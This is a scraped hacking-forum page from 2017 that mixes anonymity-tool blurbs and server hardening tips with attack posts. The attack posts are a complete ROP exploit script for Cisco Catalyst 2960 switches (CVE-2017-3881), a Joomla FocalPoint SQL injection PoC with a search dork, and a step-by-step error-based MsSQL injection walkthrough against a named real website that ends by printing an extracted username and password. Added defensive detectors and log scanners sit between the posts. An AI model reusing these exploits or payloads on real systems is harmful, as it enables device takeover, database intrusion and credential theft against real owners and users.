  Anonymous Surfing
Posted by: InfoHack - 04-16-2017, 09:41 AM - Forum: Hacking Tutorials - No Replies

To Protect Your Privacy..!!

HOLA VPN
Hola is a peer to peer network that provides everyone on the planet with freedom to
access all of the Web! It works through the community of its users - Hola users help you
to access the web.

JonDo
JonDos publishes a new version of the JonDo-Software, an IP changer and IP anonymization program that you can use for anonymous surfing on the Internet with high security anonymous proxy servers.
What is JonDo?
JonDo is an open source and free-of-charge program for Windows, Linux and MacOS X.
It hides the user's IP address behind an anonymous IP address. In contrast to other anonymizers (VPNs, anonymous proxy servers), the user's anonymity stays protected even against the providers (operators) of the anonymous IP address.

TOR
Tor is very useful for online anonymity: it protects your privacy and defends against a form of network traffic analysis. Traffic analysis can be used to infer who is talking to whom over a public network. Knowing the source and destination of your Internet traffic allows others to track your behavior and interests.
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features.
People use Tor to keep websites from tracking them and their family members, or to connect to news sites, instant messaging services, or the like when these are blocked by their local Internet providers. Tor's hidden services let users publish web sites and other services without needing to reveal the location of the site.

Tortilla
It is an open source tool that allows users to securely, anonymously, and transparently route all TCP/IP and DNS traffic through Tor, regardless of the client software, and without relying on VPNs or additional hardware or virtual machines.

ProXPN
ProXPN upgrades your internet connection with VPN encryption, secures all types of connections from DSL and cable to 3G, gives you 100% private access to the internet, and gets you an IP address in the USA, UK, or NL.
It protects against others seeing the websites you visit, hijacking your passwords, credit cards, or banking details, intercepting and spying on your email, IMs, calls, or anything else, recording your web history, and running traces to find out where you live.

UltraVPN - A Free VPN
UltraVPN is a simple user interface to connect or disconnect to our VPN servers.

To use UltraVPN, you need to right click on a traybar icon (on the bottom right of your screen) that looks like a computer with a red screen. After right clicking on it, choose "connect". 

It can be used by any individual who simply wants to protect his privacy, either on a LAN or a public hotspot.
Features:
You can connect or log in to MSN if it's blocked.
You can use VoIP software like Skype if it's blocked.
UltraVPN protects your email and browsing privacy.

How can you download UltraVPN?
Download the software client and create an account. You are now able to connect to the VPN.


  Cisco Catalyst 2960 IOS 12.2(55)SE11 Remote Code Execution
Posted by: InfoHack - 04-14-2017, 11:37 AM - Forum: Exploits - No Replies

Quote:
Code:
#!/usr/bin/python
# Exploit Title: Cisco Catalyst 2960 - Buffer Overflow
# Exploit Details: https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution/
# Date: 04.10.2017
# Exploit Author: https://twitter.com/artkond
# Vendor Homepage: https://www.cisco.com/
# Version: IOS version c2960-lanbasek9-mz.122-55.SE11)
# Tested on: Catalyst 2960 with IOS version c2960-lanbasek9-mz.122-55.SE11
# CVE : CVE-2017-3881
# Description:
#
# The exploit connects to the Catalyst switch and patches
# its execution flow to allow credless telnet interaction
# with highest privilege level
#


import socket
import sys
from time import sleep

set_credless = True

if len(sys.argv) < 3:
   print sys.argv[0] + ' [host] --set/--unset'
   sys.exit()
elif sys.argv[2] == '--unset':
   set_credless = False
elif sys.argv[2] == '--set':
   pass
else:
   print sys.argv[0] + ' [host] --set/--unset'
   sys.exit()


s = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
s.connect((sys.argv[1], 23))

print '[+] Connection OK'
print '[+] Recieved bytes from telnet service:', repr(s.recv(1024))
print '[+] Sending cluster option'
print '[+] Setting credless privilege 15 authentication' if set_credless else '[+] Unsetting credless privilege 15 authentication'



payload = '\xff\xfa\x24\x00'
payload += '\x03CISCO_KITS\x012:'
payload += 'A' * 116
payload += '\x00\x00\x37\xb4'       # first gadget address 0x000037b4: lwz r0, 0x14(r1); mtlr r0; lwz r30, 8(r1); lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
#next bytes are shown as offsets from r1
payload += '\x02\x3d\x55\xdc'       # +8  address of pointer to is_cluster_mode function - 0x34
if set_credless is True:
   payload += '\x00\x00\x99\x9c'   # +12 set  address of func that rets 1
else:
   payload +=  '\x00\x04\xeA\xe0'  # unset
payload += 'BBBB'                   # +16(+0) r1 points here at second gadget
payload += '\x00\xe1\xa9\xf4'       # +4 second gadget address 0x00e1a9f4: stw r31, 0x138(r30); lwz r0, 0x1c(r1); mtlr r0; lmw r29, 0xc(r1); addi r1, r1, 0x18; blr;
payload += 'CCCC'                   # +8
payload += 'DDDD'                   # +12
payload += 'EEEE'                   # +16(+0) r1 points here at third gadget
payload += '\x00\x06\x7b\x5c'       # +20(+4) third gadget address. 0x00067b5c: lwz r9, 8(r1); lwz r3, 0x2c(r9); lwz r0, 0x14(r1); mtlr r0; addi r1, r1, 0x10; blr;
payload += '\x02\x3d\x55\xc8'       # +8  r1+8 = 0x23d55c8
payload += 'FFFF'                   # +12
payload += 'GGGG'                   # +16(+0) r1 points here at fourth gadget
payload += '\x00\x6c\xb3\xa0'       # +20(+4) fourth gadget address 0x006cb3a0: lwz r31, 8(r1); lwz r30, 0xc(r1); addi r1, r1, 0x10; lwz r0, 4(r1); mtlr r0; blr;
if set_credless:
   payload += '\x00\x27\x0b\x94'   # +8 address of the replacing function that returns 15 (our desired privilege level). 0x00270b94: li r3, 0xf; blr;
else:
   payload += '\x00\x04\xe7\x78'   # unset
payload += 'HHHH'                   # +12
payload += 'IIII'                   # +16(+0) r1 points here at fifth gadget
payload += '\x01\x4a\xcf\x98'       # +20(+4) fifth gadget address 0x0148e560: stw r31, 0(r3); lwz r0, 0x14(r1); mtlr r0; lwz r31, 0xc(r1); addi r1, r1, 0x10; blr;
payload += 'JJJJ'                   # +8 r1 points here at third gadget
payload += 'KKKK'                   # +12
payload += 'LLLL'                   # +16
payload += '\x01\x14\xe7\xec'       # +20 original execution flow return addr
payload += ':15:' +  '\xff\xf0'

s.send(payload)

print '[+] All done'

s.close()

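For defenders, the payload above has a recognizable shape on the wire: a Telnet subnegotiation (IAC SB ... IAC SE) with option byte 0x24 that carries the CISCO_KITS string. The detector below is an added example, not part of the original post or the exploit author's code; the function names and the 64-byte length threshold are assumptions.

```python
IAC, SB, SE = 0xFF, 0xFA, 0xF0
NEGOTIATE = (0xFB, 0xFC, 0xFD, 0xFE)   # WILL, WONT, DO, DONT: each takes one option byte
OPTION = 0x24                           # option byte used by the payload on this page
MARKER = b"CISCO_KITS"
MAX_EXPECTED_LEN = 64                   # assumption: tune against your own traffic baseline

# Constructed streams: ordinary negotiation, a short marker block, and a block with
# the page's framing and 116 filler bytes (no return addresses included).
BENIGN = b"\xff\xfd\x18\xff\xfb\x01login: "
SHORT = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012::1:\xff\xf0"
LONG = b"\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + b"A" * 116 + b":15:\xff\xf0"


def subnegotiations(stream):
    """Yield (option, data) for every complete IAC SB ... IAC SE block."""
    i, n = 0, len(stream)
    while i + 1 < n:
        if stream[i] != IAC:
            i += 1
            continue
        cmd = stream[i + 1]
        if cmd in NEGOTIATE:
            i += 3
        elif cmd == SB and i + 2 < n:
            option, data, j, closed = stream[i + 2], bytearray(), i + 3, False
            while j + 1 < n:
                if stream[j] == IAC and stream[j + 1] == SE:
                    closed = True
                    break
                if stream[j] == IAC and stream[j + 1] == IAC:
                    j += 1              # doubled 0xFF is one literal data byte
                data.append(stream[j])
                j += 1
            if closed:
                yield option, bytes(data)
            i = j + 2
        else:
            i += 2                      # IAC IAC in the data stream, or a two-byte command


def find_cisco_kits(stream, max_len=MAX_EXPECTED_LEN):
    """Report every subnegotiation for OPTION that carries the marker string."""
    findings = []
    for option, data in subnegotiations(stream):
        if option == OPTION and MARKER in data:
            findings.append({"length": len(data), "oversized": len(data) > max_len})
    return findings


if __name__ == "__main__":
    for finding in find_cisco_kits(BENIGN + SHORT + LONG):
        print(finding)
```

Any hit from a host that is not a cluster member deserves a look; an oversized one matches the overflow framing shown above. Serving management over SSH instead of Telnet removes the exposed parser altogether.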

  Joomla FocalPoint 1.2.3 SQL Injection
Posted by: InfoHack - 04-14-2017, 11:35 AM - Forum: Exploits - No Replies

Quote:
Code:
# Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection
# Date: 2017-03-23
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_focalpoint
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: WIN

# POC :

id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter
http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers


  Securing a Linux server
Posted by: InfoHack - 04-11-2017, 02:55 PM - Forum: Server - No Replies

A short tutorial with advice on securing a Linux box.

When you want to make your Linux server more secure, you need to look at four aspects of the server:

1. SSH configuration
2. IPTables (firewall) configuration
3. Logs
4. Applications


SSH (Secure Shell)

Most servers are attacked using brute force against SSH.
You can verify this by looking in the file /var/log/messages

To stop this type of attack, you can simply change the port that SSH listens on (22 by default). To do this, you need to edit sshd_config, located at /etc/ssh/sshd_config. Use the following command to edit the sshd_config file:


Quote:
vim /etc/ssh/sshd_config


Find the line #Port 22, delete the '#' and change port 22 to any other port that is not in use on the machine, e.g. 1022
Then don't forget to add the new port to the firewall so that you can still log in.

Command:


Quote:
vim /etc/sysconfig/iptables



And add:

Quote:
iptables -A INPUT -p tcp -m tcp --dport 1022 -j ACCEPT


Restart the sshd service:

Quote:
service sshd restart


For IPTABLES I prefer to use a DROP policy, for as secure a configuration as possible
Command:
Quote:vim /etc/ssh/sshd_config
AllowUsers nume_utilizato


LOGS
To view the security logs:

Quote:
tail /var/log/secure


Hardware information:
Quote:dmesg


Overview information about the server:

Quote:tail /var/log/messages

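The log check this post describes can be automated. This added example (not from the original post) counts failed sshd password attempts per source address and flags a successful login that follows a burst of failures; the log lines are constructed and the threshold of 3 is an assumption.

```python
import re
from collections import Counter

# Constructed sample in the format sshd writes to /var/log/secure.
SAMPLE_LOG = """\
Apr 11 14:02:11 box sshd[2211]: Failed password for root from 203.0.113.7 port 40022 ssh2
Apr 11 14:02:13 box sshd[2211]: Failed password for invalid user admin from 203.0.113.7 port 40024 ssh2
Apr 11 14:02:15 box sshd[2212]: Failed password for invalid user oracle from 203.0.113.7 port 40030 ssh2
Apr 11 14:02:18 box sshd[2213]: Failed password for root from 203.0.113.7 port 40031 ssh2
Apr 11 14:05:40 box sshd[2290]: Failed password for deploy from 198.51.100.20 port 51010 ssh2
Apr 11 14:05:52 box sshd[2290]: Accepted password for deploy from 198.51.100.20 port 51010 ssh2
Apr 11 14:09:01 box sshd[2301]: Failed password for backup from 192.0.2.55 port 33100 ssh2
Apr 11 14:09:03 box sshd[2301]: Failed password for backup from 192.0.2.55 port 33102 ssh2
Apr 11 14:09:05 box sshd[2302]: Failed password for backup from 192.0.2.55 port 33104 ssh2
Apr 11 14:09:09 box sshd[2303]: Accepted password for backup from 192.0.2.55 port 33110 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) password for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def summarize_ssh_log(log_text, threshold=3):
    """Return noisy source addresses and logins that succeeded after many failures."""
    failures = Counter()
    tried_users = {}
    success_after_failures = []
    for line in log_text.splitlines():
        match = EVENT.search(line)
        if not match:
            continue
        ip, user = match["ip"], match["user"]
        if match["result"] == "Failed":
            failures[ip] += 1
            tried_users.setdefault(ip, set()).add(user)
        elif failures[ip] >= threshold:
            # A success right after a burst of failures may be a guessed password.
            success_after_failures.append((ip, user))
    noisy = {ip: sorted(tried_users[ip])
             for ip, count in failures.items() if count >= threshold}
    return {"bruteforce_sources": noisy,
            "success_after_failures": success_after_failures}


if __name__ == "__main__":
    print(summarize_ssh_log(SAMPLE_LOG))
```

Addresses in `bruteforce_sources` are candidates for a firewall DROP rule; an entry in `success_after_failures` means the account's password should be treated as compromised.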

  A short tutorial for beginner administrators – Apache web server
Posted by: InfoHack - 04-11-2017, 02:37 PM - Forum: Server - No Replies

Apache is one of the most commonly used web servers. If you are new to administering a web server, or just want to learn how to keep your server under control, it is useful to know a few basic Apache commands for Linux. Unless stated otherwise, all the commands listed must be run at the command line on the server.

How do you start, stop and restart the Apache web service (the commands must be run from the command line)?


Quote:Restart: “/etc/rc.d/init.d/apachectl restart”
Stop: “/etc/rc.d/init.d/apachectl stop”
Start: “/etc/rc.d/init.d/apachectl start”


Where is the httpd.conf configuration file?


Quote:“/etc/httpd/conf/httpd.conf”


How many Apache processes are running on the server at a given moment?

Quote:“ps auwx |grep httpd |wc -l”


Where is the error log file on the server?


Quote:“/var/log/httpd/error_log”

Where is the status log file?


Quote:“/var/log/httpd/access_log”

HTTP codes you should know


Quote:200 = Successful Request
304 = Successful request, but the web page requested hasn’t been modified since the current version in the remote web browser’s cache.
401 = Unauthorized access. Someone entered an incorrect username / password on a password protected page.
403 = Forbidden. File permissions prevent Apache from reading the file.
404 = Page Not found. The page requested doesn’t exist.
500 = Internal Server Error


  XSS protection
Posted by: InfoHack - 04-08-2017, 06:26 PM - Forum: Coding - No Replies

XSS attacks are among the most common in the web "world". Most beginner programmers ignore them and go straight to SQL injection protection, but XSS attacks are a problem because cookies can be stolen; if you have the cookie you can be that person, and even if there is CSRF protection, it can be bypassed through XSS. PHP provides functions to help us, such as strip_tags(), htmlentities() and filter_var(); there are others, but these are the ones I will present today. Below I present a function that I use for XSS protection:


Quote: <?php
/**
 * Protects against XSS attacks
 * @param string $str - the string that must be protected against XSS
 * @param string|false $allowable_tags - the tags that will not be removed, for example <b>
 */
function strip_xss($str, $allowable_tags = false) {
    // if tags that should not be removed were given
    if ($allowable_tags) {
        // run strip_tags without removing the wanted tag(s)
        $rez = strip_tags($str, $allowable_tags);
    // otherwise
    } else {
        // run strip_tags
        $rez = strip_tags($str);
    }
    // if javascript:alert() is entered in the input
    if (stripos($rez, "javascript:") !== false) {
        // remove javascript: (case-insensitively, to match the stripos() check)
        $result = str_ireplace("javascript:", "", htmlentities($rez, ENT_QUOTES));
    // otherwise
    } else {
        // convert to HTML entities; this protects against " onchange="alert(document.cookie); etc.
        $result = htmlentities($rez, ENT_QUOTES);
    }
    return $result;
}
?>

I do not recommend using the array_map() function to apply the function to the $_POST array, because in some cases you may not need XSS filtering, either because the values are numbers or because the received data must remain untransformed, so it would be fine to use the function when reading the data from the form.



As an extreme case, you can use $_POST=array_map('strip_xss',$_POST) to protect yourself from XSS.



The function above works on PHP versions >= 4; PHP 5 brings the filter_var function, which is an advantage for filtering data.


Example of using the filter_var function


Quote: <?php  $date['user'] = filter_var($_POST['user'], FILTER_SANITIZE_STRING); ?>

I hope what I wrote above is useful to you; please leave a comment if there is something you don't know or don't understand.


Author: mic_programator

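Stripping tags and deleting the substring javascript: depends on the input taking the expected form; encoding for the output context and allowlisting URL schemes does not. The sketch below is an added example, not the author's code, and is written in Python rather than PHP: `html.escape(..., quote=True)` plays the role of `htmlentities(..., ENT_QUOTES)`, and the function names and the set of allowed schemes are assumptions.

```python
import html
import re

ALLOWED_SCHEMES = {"http", "https", "mailto"}      # assumption: set per application
SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.-]*):")  # a leading "scheme:" prefix


def html_text(value):
    """Encode a value for an HTML text node or a quoted attribute value."""
    return html.escape(value, quote=True)


def safe_href(value, fallback="#"):
    """Return an attribute-safe URL, or the fallback when the URL is not acceptable."""
    # Browsers ignore whitespace and control characters while parsing a scheme,
    # so a URL containing any of them is rejected rather than cleaned up.
    if any(ord(ch) <= 0x20 or ord(ch) == 0x7F for ch in value):
        return fallback
    match = SCHEME.match(value)
    # Allowlist instead of removing one known-bad scheme name.
    if match and match.group(1).lower() not in ALLOWED_SCHEMES:
        return fallback
    return html.escape(value, quote=True)


def render_link(url, label):
    """Build an anchor from two untrusted values, each encoded for its own context."""
    return '<a href="{}">{}</a>'.format(safe_href(url), html_text(label))


if __name__ == "__main__":
    print(render_link("https://example.com/?a=1&b=2", "<b>profile</b>"))
    print(render_link("JavaScript:alert(document.cookie)", "click"))
    print(html_text('" onchange="alert(document.cookie);'))
```

Encoding happens at output time, once per context, so numeric fields and data that must be stored untransformed are left alone on input, which is the concern the post raises about mapping a filter over all of `$_POST`.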

  [SQLi] Tutorial MsSQL Injection
Posted by: InfoHack - 04-08-2017, 06:08 PM - Forum: Hacking Tutorials - No Replies

Quote:(+) Target http://www.assiomforex.it/news/news?id=85


-----------------------The Tutorial Begins-----------------------

1. To see whether the site is vulnerable, we add having 1=1 after ?id=85


Quote:http://www.assiomforex.it/news/news?id=85%20having%201=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'News.idc_news' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

An error, which means it is vulnerable.


2. Finding the version -->


Quote:+or+1=convert(int,(@@version))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28@@version%29%29--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore nvarchar 'Microsoft SQL Server 2008 R2 (SP1) - 10.50.2500.0 (X64) Jun 17 2011 00:54:03 Copyright © Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 (Build 7601: Service Pack 1) (Hypervisor) ' nel tipo di dati int.


Quote:/news/news.asp, riga 30

3. The databases -->


Quote:+or+1=convert(int,(db_name()))--

Quote: http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28db_name%28%29%29%29--

4. Extracting the tables -->

Quote:+or+1=convert(int,(select top 1 table_name from information_schema.tables))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%29%29--

4.1 Continuing the extraction --> To select further tables, the following query is needed:


Quote:    +or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('TABEL')))-- [ In our case the table is "download" ]


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27%29%29%29--

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'


[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore nvarchar 'anno_mappatura' nel tipo di dati int.


Quote:/news/news.asp, riga 30

anno_mappatura is another table; if you want to continue the extraction you will need the following "modification":


Quote: +or+1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('download','anno_mappatura')))--


Quote:http://www.assiomforex.it/news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27,%27anno_mappatura%27%29%29%29--

Each time you try to look for the other tables, the current table must be added inside the first parentheses; in our case, after download came anno_mappatura.


I will skip the rest of the extraction because there are very many tables, so we go straight to the "main" one that interests us, namely "userpassword"


Quote:http://www.assiomforex.it/news/news
?id
=85%20or%201%20=%20convert%20%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%20where%20table_name%20not%20in%20%28%27download%27,%27anno_mappatura%27,%27funzione_mappatura%27,%27messagging_mappatura%27,%27atti%27,%27frontoffice_mappatura%27,%27citta_mappatura%27,%27files%27,%27rassegna%27,%27codice%27,%27contatti%27,'convenzioni','utenti','soci','riviste','questionario_domande','questionario_soci','fmlink','questionario','aste','libri','questionario_risultati','questionario_risposte','galleria','organigramma','profilo','sondaggio_grafici','Job','statuto','mailinglist_liste','verbali','sondaggio_compilazioni','mailinglist_indirizzi','mailinglist_riepilogo','Categorie','appoggio','regolamento'

%29%29%29--
5. Extracting the columns from the userpassword table.



You will need the following query:



select * from userpassword having 1=1--



Microsoft OLE DB Provider for ODBC Drivers error '80040e14'


[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_email' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

We continue finding the columns, with a method somewhat different from the one used for the tables:


Quote:select * from userpassword group by userpassword.txt_email having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_username' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.


Quote:/news/news.asp, riga 30

We continue:


Quote:select * from userpassword group by userpassword.txt_email,userpassword.txt_username having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]La colonna 'userpassword.txt_password' non è valida nell'elenco di selezione perché non è inclusa né in una funzione di aggregazione né nella clausola GROUP BY.

/news/news.asp, riga 30 

Done, we have the columns: txt_username and txt_password

6. Extracting the data from txt_username and txt_password:

Quote:or 1 = convert (int,(select top 1 txt_username from userpassword))--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore varchar 'AlfieroAlb' nel tipo di dati int.


Quote:/news/news.asp, riga 30
 


Quote:or 1 = convert (int,(select top 1 txt_password from userpassword))--


Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversione non riuscita durante la conversione del valore varchar '9ck8r59g' nel tipo di dati int.

/news/news.asp, riga 30 

Username: AlfieroAlb

Password: 9ck8r59g


// Shadow @ Thieves-Team



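Every request in the walkthrough above leaves the same traces in a web server access log: URL-encoded `convert(int, ...)`, `having 1=1` or `information_schema` strings, typically answered with an error status. This added example (not part of the original post) decodes each request target before matching, since the payloads arrive as `%28` and `+` rather than literal parentheses and spaces; the log lines, signature names and function names are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines; addresses are documentation ranges.
SAMPLE_LOG = """\
198.51.100.9 - - [08/Apr/2017:18:01:02 +0000] "GET /news/news?id=85 HTTP/1.1" 200 5120
203.0.113.44 - - [08/Apr/2017:18:02:10 +0000] "GET /news/news?id=85%20having%201=1-- HTTP/1.1" 500 712
203.0.113.44 - - [08/Apr/2017:18:02:31 +0000] "GET /news/news?id=85+or+1=convert%28int,%28@@version%29%29-- HTTP/1.1" 500 980
203.0.113.44 - - [08/Apr/2017:18:03:05 +0000] "GET /news/news?id=85+or+1=convert%28int,%28select%20top%201%20table_name%20from%20information_schema.tables%29%29-- HTTP/1.1" 500 655
198.51.100.9 - - [08/Apr/2017:18:04:00 +0000] "GET /search?q=having+fun+converting+units HTTP/1.1" 200 2048
"""

LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Patterns taken from the payloads shown in the post, matched after decoding.
SIGNATURES = {
    "having-probe": re.compile(r"\bhaving\s+1\s*=\s*1"),
    "convert-int": re.compile(r"convert\s*\(\s*int\s*,"),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)"),
    "fingerprint": re.compile(r"@@version|db_name\s*\("),
}


def normalize(target):
    """Decode the query string, lowercase it and collapse runs of whitespace."""
    query = target.partition("?")[2]
    return re.sub(r"\s+", " ", unquote_plus(query).lower())


def scan_access_log(log_text):
    """Group matching requests by client address."""
    hits = defaultdict(lambda: {"requests": 0, "errors": 0, "signatures": set()})
    for line in log_text.splitlines():
        match = LINE.match(line)
        if not match:
            continue
        text = normalize(match["target"])
        matched = {name for name, rx in SIGNATURES.items() if rx.search(text)}
        if not matched:
            continue
        entry = hits[match["ip"]]
        entry["requests"] += 1
        entry["errors"] += int(match["status"].startswith("5"))
        entry["signatures"] |= matched
    return {ip: {**entry, "signatures": sorted(entry["signatures"])}
            for ip, entry in hits.items()}


if __name__ == "__main__":
    print(scan_access_log(SAMPLE_LOG))
```

Detection does not fix the flaw: binding `id` as a typed query parameter and returning a generic error page instead of the driver message removes both the injection and the error channel the walkthrough depends on.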